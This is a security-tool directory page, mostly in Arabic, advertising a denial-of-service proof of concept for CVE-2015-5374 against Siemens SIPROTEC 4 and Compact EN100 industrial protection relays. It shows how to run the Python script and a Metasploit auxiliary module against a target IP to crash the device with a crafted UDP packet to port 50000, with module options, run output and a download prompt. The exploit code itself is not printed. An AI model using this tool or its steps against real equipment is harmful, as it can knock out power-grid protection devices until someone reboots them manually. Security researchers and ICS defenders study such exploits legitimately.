Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2015-5374-DoS-PoC — استغلال حجب الخدمة (DoS) لثغرة CVE-2015-5374 التي تستهدف وحدات Siemens SIPROTEC 4 وCompact EN100 Ethernet عبر حزمة UDP مصممة خصيصًا إلى المنفذ 50000، مع تضمين وحدة مساعدة Metasploit. | Kitploit
أدوات/GitHubGitHub/can/cve-2015-5374-dos-poc
أطر الاستغلالتحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSاختبار الاختراق
GitHubcan/cve-2015-5374-dos-poc

CVE-2015-5374-DoS-PoC

استغلال حجب الخدمة (DoS) لثغرة CVE-2015-5374 التي تستهدف وحدات Siemens SIPROTEC 4 وCompact EN100 Ethernet عبر حزمة UDP مصممة خصيصًا إلى المنفذ 50000، مع تضمين وحدة مساعدة Metasploit.

عرض المستودع
339منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2015-5374 سيمنز SIPROTEC 4 ووحدة الإيثرنت SIPROTEC Compact EN100 < V4.25 - رفض الخدمة

يرسل هذا الكود حزمة مصممة خصيصًا إلى المنفذ 50000/UDP مما قد يتسبب في رفض الخدمة للجهاز المتأثر. يلزم إعادة تشغيل يدوية لإعادة الجهاز إلى الخدمة. تم إسناد CVE-2015-5374 ودرجة أساسية 7.8 في CVSS v2 إلى هذه الثغرة الأمنية.

root@kitploit:~
can@exploit:~/siprotec_dos_poc$ python Siemens_SIPROTEC_DoS.py <target>
CVE-2015-5374 Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service
Sending packet to <target> ...
Done, say goodbye!

وحدة Metasploit

ترسل هذه الوحدة حزمة مصممة خصيصًا إلى المنفذ 50000/UDP مما قد يتسبب في رفض الخدمة للجهاز المتأثر. يلزم إعادة تشغيل يدوية لإعادة الجهاز إلى الخدمة.

خطوات التحقق

  1. نفّذ: use auxiliary/dos/scada/siemens_siprotec4
  2. نفّذ: set RHOST [Target IP]، مع استبدال [Target IP] بعنوان IP الذي ترغب في مهاجمته.
  • نفّذ: run
  • إذا كان جهاز سيمنز SIPROTEC 4 أو Compact يعمل بأحد الإصدارات المعرضة للخطر، فسيتعطل فورًا.
  • الخيارات

    set RHOST [Target IP]، set RPORT [Target Port (Default 50000)].

    السيناريوهات

    root@kitploit:~
    msf auxiliary(siemens_siprotec4) > info
    
         Name: Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < V4.25 - Denial of Service 
       Module: auxiliary/dos/scada/siemens_siprotec4
      License: Metasploit Framework License (BSD)
         Rank: Normal
    
    Provided by:
    M. Can Kurnaz
    
    Basic options:
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    RHOST                   yes       The target address
    RPORT  50000            yes       The target port (UDP)
    
    Description:
    This module sends a specially crafted packet to port 50000/UDP 
    causing a denial of service of the affected (Siemens SIPROTEC 4 and 
    SIPROTEC Compact) devices. A manual reboot is required to return the 
    device to service. CVE-2015-5374 and a CVSS v2 base score of 7.8 
    have been assigned to this vulnerability.
    
    References:
    https://www.exploit-db.com/exploits/44103/
    https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01
    
    msf auxiliary(siemens_siprotec4) > show options 
    
    Module options (auxiliary/dos/scada/siemens_siprotec4):
    
     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     RHOST                   yes       The target address
     RPORT  50000            yes       The target port (UDP)
    
    msf auxiliary(siemens_siprotec4) > set rhost 192.168.1.61
    rhost => 192.168.1.61
    msf auxiliary(siemens_siprotec4) > run
    
    [*] Sending DoS packet ... 
    [*] Auxiliary module execution completed
    msf auxiliary(siemens_siprotec4) > 
    
    تنزيل الأداة